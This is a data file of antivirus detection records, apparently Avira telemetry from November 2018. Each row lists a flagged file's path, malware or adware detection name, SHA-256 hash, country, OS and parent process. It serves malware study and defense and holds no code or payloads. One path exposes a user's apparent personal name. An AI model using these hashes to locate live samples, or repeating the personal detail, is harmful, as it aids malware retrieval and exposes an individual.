  Row(detection=Row(filename='avscan-20181101-180106-c6f44759', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c0bde066\\AVSCAN-20181101-175944-B81E2D52\\AVSCAN-20181101-180106-C6F44759', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:01:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='rlistupdater', filepath='/Applications/Advanced Mac Cleaner.app/Contents/Resources/helperamc.app/Contents/Resources/rlistupdater.app/Contents/MacOS/rlistupdater', filesize=204000, name='OSX/GT32SupportGeeks.owcbg.#M0.#R0'), hash='877421f09497bb504dde87c3107888c89f174b955dacb088873bf9754babe5f3', metadata=Row(cmdline=None, country='US', os_name='MacOS', os_vmajor='17', os_vminor='4', parentproc=None, parentsize=None, timestamp='2018-11-01T23:21:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T12:47:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='colorcpl.exe', filepath='C:\\System32\\colorcpl.exe', filesize=128000, name='W32/Neshta.A.#M1.#R1'), hash='510ce84c7efd361ef6c62d7c7d17a7bc1025da29245e9a87bdffb1d5439933a8', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe6_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe6 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T08:12:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:31:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-173351-3b9059e6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e28951c1\\AVSCAN-20181104-170735-27CB4304\\AVSCAN-20181104-173351-3B9059E6', filesize=768000, name='WORM/Pimybot.JA.1.#M1.#R1'), hash='5cc1e61c072716b3441ffa86c7e63567559b222d6f7826a593b9793e5bd8d99c', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:33:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-130935-0fbd4df0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130336-F49E60EB\\AVSCAN-20181104-130935-0FBD4DF0', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:09:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-140247-f1f57be1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_10bae96c\\AVSCAN-20181104-140204-EA8B75B2\\AVSCAN-20181104-140247-F1F57BE1', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T09:10:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\PROGRAM FILES\\Avira\\Antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\aswidsagent.exe', parentsize=6800144, timestamp='2018-11-04T13:49:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate (1).exe', filepath='C:\\Users\\X\\Documents\\Downloads\\flashupdate (1).exe', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='BA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T15:22:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0001ecfa', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp0001ecfa', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:20:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msn.exe', filepath='C:\\win\\msn.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='a9c1e2a015132b75d7ac1c7d38f524228e81ce54141a37eb44d7b3ba49ac70bd', metadata=Row(cmdline=None, country='GH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\win\\msn.exe', parentsize=1600000, timestamp='2018-11-04T13:41:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-131607-2d5b0830', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130336-F49E60EB\\AVSCAN-20181104-131607-2D5B0830', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:16:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='allcallrecorder 1.21.apk', filepath='\\\\?\\D:\\pushkar\\New folder\\System Volume Information\\Xender\\app\\APPLICATIONS\\AllCallRecorder 1.21.apk', filesize=60000, name='Adware/ANDR.AirPush.VW.Gen.#M1.#R1'), hash='589c9a93b8f4bacb322d60825b6b9c35e76d44be14adf3212ec71eba3279034d', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:49:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0002444d', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp0002444d', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:52:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-04T09:49:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp000240ee', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp000240ee', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:44:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181103-185651-22095ca8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_725881c2\\AVSCAN-20181103-185330-12D1AE70\\AVSCAN-20181103-185651-22095CA8', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T00:56:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-131539-2b3db3e9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-131539-2B3DB3E9', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:15:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-194250-10c251ac', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8121bda9\\AVSCAN-20181104-191248-159A46FF\\AVSCAN-20181104-194250-10C251AC', filesize=128000, name='ADWARE/Adware.Gen.#M1.#R1'), hash='4f2c543edd9f54151ae962e25b743ac11b649e68ab9bcb8a66c0c5202edc2f7f', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:42:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-173327-376171f3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e28951c1\\AVSCAN-20181104-170735-27CB4304\\AVSCAN-20181104-173327-376171F3', filesize=768000, name='WORM/Pimybot.JA.1.#M1.#R1'), hash='5cc1e61c072716b3441ffa86c7e63567559b222d6f7826a593b9793e5bd8d99c', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:33:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcoded_000', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\Transcoded_000', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2411048, timestamp='2018-11-04T08:14:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='diagnosticshub.standardcollector.service.exe', filepath='C:\\Windows\\System32\\DiagSvcs\\DiagnosticsHub.StandardCollector.Service.exe', filesize=64000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='0375a8abdd68739293e8746e0bcc449686ed62bb2b114ce363695c4b09e83bfc', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T04:07:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe', parentsize=1589080, timestamp='2018-11-04T15:12:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-203859-e9957e14', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d3696609\\AVSCAN-20181104-193953-66E2BE01\\AVSCAN-20181104-203859-E9957E14', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:39:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T12:18:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transfer.exe', filepath='\\\\?\\C:\\C-GEO\\bin\\transfer.exe', filesize=640000, name='HEUR/APC.#M1.#R1'), hash='3f55ca75850001e31add3eb2261f3453e9d7a3f4648f9cbb76266171908c75b1', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T08:43:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-151639-db7fe002', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5dd10c7b\\AVSCAN-20181104-150719-909FFCA3\\AVSCAN-20181104-151639-DB7FE002', filesize=512000, name='HEUR/AGEN.1019708.#M1.#R1'), hash='2b42bff479811938c6fe0c277d9bb34e3fd272ca38b4356253c340700d1d353e', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:16:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T10:59:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T15:29:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\hkiugqukypd\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:42:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='$rrh6om5.dll', filepath='C:\\$Recycle.Bin\\S-1-5-21-3234532219-278635398-83401512-1001\\$RRH6OM5.dll', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T14:10:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='my_print_defaults.exe', filepath='\\Device\\HarddiskVolume65\\DATEN\\SAGE\\Sage New Classic\\MySQL 560\\bin\\my_print_defaults.exe', filesize=6016000, name='TR/Patched.Gen.#M300.#R3374'), hash='06a58d5ca253248793b55e8312663de4ad0c5cf527692cf9867f5895dd72f110', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\wbengine.exe', parentsize=None, timestamp='2018-11-04T20:20:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='systm.exe', filepath='C:\\Users\\X\\Desktop\\OrganiZen\\Tümü bir arada 29-09-2017\\csduragi_cs16\\new2\\systm.exe', filesize=1472000, name='W32/Ramnit.C.#M1.#R1'), hash='9b861b0a70f3ed516a9b36b828f80c4a0aa63204cf38ec00c73bb5b4d9a9611b', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:Uepi6M2VeUykr3v+.1', country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T14:38:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files (x86)\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-04T15:45:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msiexec64_11004c89.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-04_14-01-20\\msiexec64_11004c89.exe', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe420_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe420 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-04T09:09:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-134822-6acde2ed', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a9c4301d\\AVSCAN-20181104-133822-1E046ACA\\AVSCAN-20181104-134822-6ACDE2ED', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:48:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp001f8cf7', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp001f8cf7', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T12:32:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='00002665.exe', filepath='\\\\?\\D:\\KDR\\exe\\00002665.exe', filesize=320000, name='TR/Crypt.XPACK.Gen.#M300.#R2936'), hash='14b206fdd747f2368fe61789340b539ec3c831f9fd0346e17eff2ba3827b47ed', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:43:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate (1).exe', filepath='C:\\Users\\X\\Downloads\\flashUpdate (1).exe', filesize=1536000, name='TR/Dropper.Gen.#M300.#R3467'), hash='a766e86b8157a590bafa1466d0c2883d87541742f26db5ffa165b403124cfacf', metadata=Row(cmdline=None, country='HU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2613248, timestamp='2018-11-04T15:12:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='skypebrowserhost.exe', filepath='C:\\Program Files (x86)\\Skype\\Browser\\SkypeBrowserHost.exe', filesize=316000, name='W32/Jeefo.A.#M1.#R1'), hash='62ac20fca24ae12db5bd321d163f504a439d97e12b8ab3112e3a9f66c2c68e26', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:z75Mv\\\\\\/kyX02WpYTu.1', country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T21:12:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-214758-5dd75b5b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-214003-0813A641\\AVSCAN-20181104-214758-5DD75B5B', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:48:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-205516-23eb7c9e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-204551-BE17A931\\AVSCAN-20181104-205516-23EB7C9E', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T11:55:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0003dfd0', filepath='C:\\Windows\\Temp\\2506595e-9777-4d59-b538-5440db77ee06\\tmp00003411\\tmp0003dfd0', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='0d1593e54e93e09077e3ca8722f813d99da89241786fbc8a9bbce08446682b95', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.4.942.11595\\AdAwareService.exe', parentsize=542896, timestamp='2018-11-04T09:16:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-142925-0029bcbc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d5964c17\\AVSCAN-20181104-141526-5A93CEC8\\AVSCAN-20181104-142925-0029BCBC', filesize=3712000, name='TR/Crypt.ZPACK.Gen2.#M1.#R1'), hash='078e9a6ae1ed2b2ef178f7bbb12a0a04ba629e1fce6313436d1b806df237491c', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T13:29:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-194046-fd7e7e39', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181104-194017-F7650109\\AVSCAN-20181104-194046-FD7E7E39', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='MM', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:10:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T15:02:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-201137-4bee8c8e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-200336-F55350DA\\AVSCAN-20181104-201137-4BEE8C8E', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T11:11:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mottoes.exe', filepath='\\\\?\\C:\\Windows\\mottoes.exe', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='dc32debc43ca8ebd3865dc4bf7ad4a3368ccc39c43f68aca51ec95f642c336a6', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T16:33:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='e_farngei.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{7867A1B7-AB4F-4FAF-8BE8-E64B0D8AA5B0}\\E_FARNGEI.EXE', filesize=256000, name='W32/Alman.BB.#M1.#R1'), hash='a8def4e45e01b29ea7b409415d5336ec2a66eee3329b4c877bcf13534e3d457a', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T05:41:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp000feab9', filepath='C:\\Windows\\Temp\\96471c11-35d4-4dc9-ad1d-2aa0b87bc74b\\tmp000002e4\\tmp000feab9', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='8468c3203db279591d6f3ca70d715214b3a8402c2e75c2b8753a53e0fdbd65a0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.5.961.11619\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-02T15:12:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='rad2cb1c.tmp.exe', filepath='C:\\Documents and Settings\\X\\Local Settings\\Temp\\rad2CB1C.tmp.exe', filesize=192000, name='TR/AD.Bulta.Y.#M1.#R1'), hash='e3786ecd97f36eb1160b9eb50df42a58590d307c4b5e962bc7711bab4f8e7882', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:11:55Z'), dt=datetime.date(2018, 11, 2)),
